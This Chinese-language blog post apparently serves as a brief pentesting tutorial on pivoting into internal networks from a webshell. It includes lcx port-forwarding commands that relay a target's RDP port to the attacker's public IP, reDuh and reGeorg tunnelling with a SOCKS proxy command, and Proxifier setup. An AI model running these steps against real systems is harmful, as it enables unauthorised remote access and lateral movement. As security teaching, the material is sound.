內網滲透之——淺析內網滲透

淺析內網滲透

關於內網滲透其實方法和思路以及要注意的點內容非常多,又是一個大坑,我就暫且先從三個情況下分別整理一種方法,大概瞭解一下,先挖個坑哈,手裏還有資料但太亂了,之後我再整理吧(真的很多,不是我偷懶,看的眼都暈了,感覺就是一套全新的滲透測試那麼多)
在這裏插入圖片描述

前瞻

先回看一下之前的幾個小思路吧

Webshell如何開啓3389服務

1、通過修改註冊表開啓遠程終端,詳情請看: http://blog.sina.com.cn/s/blog_4b92e0c80100gx3x.html
2、通過3389工具開啓遠程終端
3、數據庫可以開
4、上傳exe可以開

服務器端口被修改如何查找

註冊表讀取、
端口掃描、
命令探針查找修改後的端口

外到內滲透連接

拿到webshell,服務器處於內網(沒有公網地址)的情況下如何遠程連接

1、通過lcx工具解決內網遠程連接

把lcx傳到遠程服務器去
原理就是把目標機端口轉發到自己公網IP的端口
Webshell上執行:lcx.exe -slave 自己的公網ip 2222 127.0.0.1 3389
將本機3389端口流量轉發到公網ip的2222端口上去
自己的電腦裏面執行:lcx.exe -listen 2222 4444
監聽本地的2222端口將流量轉發到4444
然後連接127.0.0.1 4444

缺陷

可能在公司裏實際滲透測試過程中,你是在內網中的,同時你無法操控路由器,沒有公網地址
解決就通過下面講的服務器處於內網遠程連接

內到內滲透連接

兩臺電腦分別在各自的內網怎麼連接

通過端口轉發腳本解決內網遠程連接
通過reDUH
選擇對應語言的文件上傳
訪問一下
通過設置,將本地3389映射到1234上
訪問127.0.0.1 1234

內網滲透測試

在上面我們講到的都是單端口轉發,那麼如何擴大戰果,得到與目標機同一公網下的其他主機的權限呢

環境準備

兩臺虛擬機
兩個網卡
一個處於lan區段1
另一個nat模式映射到公網

方法:需要兩個工具結合

reGeorg

把tunnel.php傳到服務器
本地執行cmd

reGeorg-master\reGeorgSocksProxy.py -p  9999 -u http://192.168.0.102:8080/tunnel.nosocket.php

讓內網之間構成一個通道

Proxifier

代理工具裝在本機
設置地址127.0.0.1端口跟上面對應
協議選擇

socks協議
各種協議都支持
https協議
web

配置代理規則

本地所有數據包都走socks
通過它轉發本地所有流量

補充

關於burp+Proxifier結合抓包

有很多APP現在是防代理的或者黑名單防禦,比如微信
但是抓包中間加一個環節使用這個軟件 就可以應對了
因爲socks是很正規的

方法
在電腦上裝模擬器
把burp ca證書丟在模擬器里加載
設置規則 新建規則 讓模擬器這個進程所有數據包走socks就可以了
注意 結合使用的工具不要進行攔截 要選擇direct模式
訪問驗證

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章